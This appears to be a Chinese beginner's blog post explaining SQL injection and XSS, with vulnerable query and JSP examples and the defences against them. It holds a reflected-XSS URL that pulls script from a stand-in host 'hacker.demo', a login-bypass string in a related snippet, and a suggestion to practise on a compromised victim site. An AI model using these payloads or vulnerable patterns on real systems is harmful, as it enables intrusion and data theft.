浅谈SQL注入,XSS攻击

最新推荐文章于 2024-05-16 11:55:16 发布
最新推荐文章于 2024-05-16 11:55:16 发布
阅读量1k 收藏 2
点赞数 6
分类专栏: 信息安全 文章标签: 信息安全 SQL XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41606378/article/details/88848792
版权

作为计算机小白,一直都认为黑客很牛逼所以简单的了解一下这反面的知识——信息安全
黑客是个英译词,译作Hacker。黑客攻击或者黑计算机的方式多种多样,主要分为两种:
(1)非破坏性的攻击:一般是为了扰乱系统的运行,并不盗窃系统资料,仅仅只是使服务器暂时失去对外提供服务的能力,通常采用拒绝服务攻击或信息炸弹
(2)破坏性攻击:是以侵入他人电脑系统、盗窃系统保密信息、破坏目标系统的数据为目的
常见的攻击有DDOS,CSRF,Dos等,通常通过的途径有病毒式,洪水式,系统漏洞等。
下面简单的介绍几种

SQL注入

常见的注入式攻击,通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句添加链接描述
造成可以进行SQL注入的本质原因就是未将代码与数据进行严格的隔离,导致用户在读取数据的时候,错误的把数据作为代码的一部分执行。
下面举个简单的例子:

var testCondition;
testCondition = Request.from("testCondition")
var sql ="select * from TableA where id='"+ testCondition +"'";

在上面的例子当中,如果用户输入的ID只是一个数字当然没有任何问题,但是如果用“;‘隔开后,在testCondition里面插入其他SQL语句,则会出现意想不到的结果。例如输入drop,delete等。例如你不小心输入"#–!#@"这样的字符然后保存使得数据库跟新就会使where后面的信息被注释掉了,执行语句就变成了

updata table set memo=""# --! #(@" where use_id=xxxxxxx;

使得全数据库的memo字段的数据都被跟新了,而不是你一个人的数据。
下面有几个兄弟写的很详细,大家可以去看看
(1)最详细的SQL注入教程–易利伟
(2)web完全篇之SQL
(3)SQL注入攻击
(4)用sql注入攻破网站
大家可以找个一个肉鸡网站去试试或者自己写一个肉鸡网站也是个不错的选择
SQL注入的危害极大,在进行程序设计时我们可以从下面几个方面进行预防

(1)过滤用户输入参数中的特殊字符,从而降低被SQL注入的风险

(2)禁止使用字符串拼接的SQL语句,严格使用参数绑定传入的SQL参数

(3)合理使用数据库访问框架提供的防注入机制

xss攻击

    XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets,CSS)
 的缩写混淆,故将跨站脚本攻击缩写为XSS,XSS是一种在web应用中的计算机安全漏洞,
 它允许恶意web用户将代码植入到提供给其它用户使用的页面中。即黑客通过技术手段向
 正常用户请求的HTML页面中插入恶意脚本,从而可以执行任意脚本
xss的分类

(1)反射型XSS

   恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来
实施攻击的。

(2)存储型XSS

     恶意代码被保存到目标网站的服务器中,这种攻击具有较强的稳定性和持久性,比较
常见场景是在博客,论坛等社交网站上,但OA系统,和CRM系统上也能看到它身影,比如某
CRM系统的客户投诉功能上存在XSS存储型漏洞,黑客提交了恶意攻击代码,当系统管理员
查看投诉信息时恶意代码执行,窃取了客户的资料,然而管理员毫不知情,这就是典型的
XSS存储型攻击。

(3) DOM型XSS

其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。

比如在2011年微博左右XSS蠕虫攻击事件,攻击者就利用微博发布功能中未对action-data漏洞做有效的过滤,在发布微博信息的时候戴上了包含攻击脚本的URL,用户访问该微博是便疯狂加载恶意脚本,该脚本会让用户以自己的账号自动转发同一条微博,通过这样的病毒式扩散,大量用户受到攻击。
下面举个简单的实例可能会导致反射型XSS的文件:

<div>
<h3>反射型XSS实例</h3>
<br>用户:<%=request.getParamer("useName")%>
<br>系统错误信息:<%=request.getParamer("errorMessage")%>
<div>

上面的代码从HTTP请求中取得了userName和errorMessage两个参数,并直接输出到HTML中用于展示,当构造这样一种URL时就出现了反射型XSS,用户便会执行脚本文件

http://xss.demo/self-xss.jsp?userName=666<script>alert("666")</script>
&errorMessage=XSS实例<script scr=http://hacker.demo/xss-script.js>
XSS攻击的预防主要是通过对用户的输入数据进行过滤和转义,如使用jsonp框架对用户输入的字符串作XSS过滤,使用Sping框架中的HtmlUtils对用户输入的字符串做html转义等

下面是几篇写的较为详细的XSS攻击博客
(1)web安全之XSS攻击
(2)XSS跨站脚本攻击
(3)XSS防御方法
(4)浅谈XSS攻击原理
时间匆匆而逝,下次我再来分享一点点关于第三种黑客攻击:CSRF的知识

不会算法的数学小白
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
浅谈一次与sql注入 & webshell 的美丽“邂逅”
09-09
WAF可以通过检测和阻止不符合预期的HTTP请求来防止SQL注入XSS攻击,但必须定期更新和调整策略以适应不断变化的威胁环境。 【防护策略调整】 在遭受攻击后,重要的是立即加强防护策略。案例中,将WAF策略从宽松...
判断漏洞是否攻击成功
tlucky的博客
04-16 5171
判断是否攻击成功
经典:Web安全之XSSSQL注入
jklbnm12的博客
06-24 630
一、前言 近几年,伴随互联网的高速发展,对Web安全问题的重视也越来越高。Web应用所面临的威胁来自很多方面,其中黑客的破坏是影响最大的,黑客利用Web应用程序存在的漏洞进行非法入侵,从而破坏Web应用服务,盗取用户数据等,如何防范漏洞带来的安全威胁是一项艰巨的挑战。 为了增强用户的交互体验,开发者们在Web应用程序中大量应用客户端脚本,使Web应用的内容与功能变得丰富有趣,然而隐藏的安全威胁随之而来,黑客们将Web攻击的思路从服务器端转向了客户端,利用客户端脚本漏洞的攻击变得越来越强大,如跨站脚本
Spring Boot 如何防护 XSS + SQL 注入攻击 ?终于懂了!
weixin_44421461的博客
05-16 225
????这是一个或许对你有用的社群????一对一交流/面试小册/简历优化/求职解惑,欢迎加入「芋道快速开发平台」知识星球。下面是星球提供的部分资料:《项目实战(视频)》:从书中学,往事中“练”《互联网高频面试题》:面朝简历学习,春暖花开《架构 x 系统设计》:摧枯拉朽,掌控面试高频场景题《精进 Java 学习指南》:系统学习,互联网主流技术栈《必读 Java 源码专栏》:知其然,知其所以然????这是一个或许...
入侵与检测技术-SQL注入XSS漏洞利用
kelxLZ的博客
05-31 2205
Author:ZERO-A-ONE Date:2021-05-31 一、环境搭建 这里我们主要使用Linux环境配合Docker快速搭建相关环境 使用的机器配置: 腾讯云 OS:Ubuntu 18.04 LTS CPU:Intel® Xeon® Gold 6148 CPU @ 2.40GHz RAM:2GB 1.1 Docker 1.1.1 简介 Docker 最初是 dotCloud 公司创始人Solomon Hykes在法国期间发起的一个公司内部项目,它是基于 dotCloud 公司多年云服务技.
SQL注入XSS攻击
neverSaynever_的博客
02-20 1647
攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。这里不仅仅 div 的内容被注入了,而且 input 的 value 属性也被注入, alert 会弹出两次。我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。XSS 攻击是页面被注入了恶意的代码,为了更形象的介绍,我们用发生在小明同学身边的事例来进行说明。
07-XSS攻击与防御1
08-03
1、论安全响应中心的初衷 2、安全应急响应中心之威胁情报探索 3、论安全漏洞响应机制扩展 4、企业级未授权访问漏洞防御实践 5、浅谈企业SQL注入漏洞的危害与防
浅谈Web应用的网络安全.pdf
09-20
浅谈Web应用的网络安全.pdf 本文对Web应用的网络安全进行了详细的讨论,从Web技术的发展、管理到安全方面都进行了阐述。文章首先介绍了Web技术在商业活动上的使用和普及,然后提到了Web应用系统的漏洞问题,接着...
Web_安全架构浅谈.pdf
01-02
- 扫描器用于检测Web应用中的安全漏洞,如SQL注入、跨站脚本(XSS攻击。 - 扫描器具备指纹识别能力,可以识别Web应用的特定特征。 - 支持对FLASH内容的扫描,因为FLASH曾是Web应用中常见的攻击目标。 - 端口...
浅谈在WEBSHELL下如何运行命令.pdf
11-25
其中提到的主要安全威胁包括SQL注入XSS跨站脚本攻击、上传漏洞、弱口令和目录遍历等。由于这些漏洞的存在,黑客通常通过WEB应用作为突破口,获取WEBSHELL以进行进一步的攻击或权限提升。 0×01 ASP环境下运行命令...
XSS注入(跨站脚本攻击
wwwwyyyrre的博客
06-13 6436
今天学习一下xss注入。
xss攻击 SQL注入
qq_65208982的博客
06-10 1211
QL注入,是发生于应用程序与数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。SQL 注入一般发生在用户交互场景中,比如需要用户自已输入信息的输入框,或者下拉选择选项的这种,如果不做好输入内容的过滤,就很可能发生 SQL 注入。
实验二、XSSSQL注入
weixin_30525825的博客
05-21 555
一、 实验目的 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 二、 系统环境:Kali Linux2、Windows 三、 网络环境:交换网络结构 四、 实验工具:AWVS(Acunetix Web Vulnar...
带你理解什么是xss攻击sql注入攻击和csrf攻击及防范措施
南余.的博客
07-06 8192
随着互联网的高速发展,信息安全问题已经成为行业最为关注的焦点之一。总的来说安全是很复杂的一个领域,在移动互联网时代,前端人员除了传统的 XSS、CSRF 等安全问题之外,还时常遭遇网络劫持、非法调用 Hybrid API 等新型安全问题。这篇文章会介绍一些常见的安全问题及如何防范的内容,在当下其实安全问题越来越重要,已经逐渐成为前端开发必备的技能了。
【web应用安全攻防技术】02 SQL注入 & XSS注入
m0_57432233的博客
01-31 1904
SQL注入攻击是利用Web应用程序数据层存在的输入验证不完善型安全漏洞实施的一类代码注入攻击技术跨站脚本是一种通常存在于Web应用程序中的安全漏洞,使得攻击者可以将恶意的代码注入到网页中,从而危害其他Web访问者(敏感信息、客户端渗透攻击等)客户端脚本:Javascript,Flash ActionScript等。
WEB安全之XSS漏洞与SQL注入漏洞介绍及解决方案
m0_74131821的博客
04-18 1770
这篇文章把XSS跨站攻击SQL注入的相关知识整理了下,比较适合初学者观看。
web漏洞利用---XSS注入攻击
m0_65129142的博客
12-20 5397
XSS漏洞简介 XSS注入漏洞又称为"跨站脚本攻击(Cross Site Scripting)",为了不和层叠样式表(Cascading Style Sheets,CSS)混淆,所以将跨站脚本攻击缩写为XSSXSS注入攻击的原理其实和SQL注入攻击的原理很相似,攻击者将恶意的Script代码插入到网页中,当正常用户浏览该页面时,被嵌入的恶意Script代码就会被执行,从而达到恶意攻击正常用户的目的。 XSS分类 跨站脚本注入漏洞是由于WEB服务器读取了用户可控数据输出到HTML页面的过程中没有进行安全处理
常见网络攻击及防御方法总结(XSSSQL注入、CSRF攻击
xiaohui的博客
04-05 3834
  从互联网诞生之初起,无时无刻不存在网络攻击,其中XSS攻击SQL注入攻击是网站应用攻击的最主要的两种手段,全球大约70%的网站应用攻击都来自XSS攻击SQL注入攻击。此外,常用的网站应用攻击还包括CSRF、Session劫持等。 1、 XSS攻击   XSS攻击即跨站点脚本攻击(Cross Site Script),指的是攻击者通过篡改网页,注入恶意的HTML脚本,在用户浏览网页时,控制用户浏览器进行恶意操作的一种攻击方式。   常见的XSS攻击类型有两种,一种是反射型,攻击者诱使用户点击一个嵌入恶
sql注入 xss攻击和csrf攻击的区别
最新发布
06-13
SQL注入XSS(跨站脚本攻击)和CSRF(跨站请求伪造)是三种常见的网络安全威胁,它们针对的应用场景和攻击机制有所不同。 1. SQL注入: - **定义**:攻击者通过在输入字段中插入恶意SQL代码,欺骗应用程序执行非授权的数据库查询,可能获取敏感信息或修改数据。 - **目标**:主要影响Web应用程序后端数据库,试图访问或操控存储在服务器的数据。 - **示例**:尝试在登录表单中输入"\' OR '1'='1",可能导致所有用户登录。 2. XSS攻击: - **定义**:攻击者在网站上植入恶意脚本,当用户访问含有这些脚本的页面时,脚本会在用户的浏览器上执行,可能窃取用户信息或控制用户的会话。 - **目标**:影响用户浏览器,操纵前端显示内容,或利用用户的行为进行攻击。 - **示例**:在网页中添加未过滤的用户评论,评论中包含HTML代码,如`<img src="malicious.com">`,可能导致恶意图片加载或跟踪。 3. CSRF攻击: - **定义**:攻击者通过伪装成合法用户,利用受害者已经登录的身份,发送请求到受信任的网站执行未经授权的操作,如转账、修改设置等。 - **目标**:利用用户的已认证状态,进行无需用户干预的恶意操作。 - **示例**:网站提供一个“一键购买”功能,如果一个恶意网站包含一个隐藏的表单,填充了受害者账户信息并指向该功能,用户无意点击后可能会完成购买。 相关问题: 1. 如何防止SQL注入攻击? 2. XSS攻击通常如何防御? 3. CSRF攻击如何通过令牌机制来防范?
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值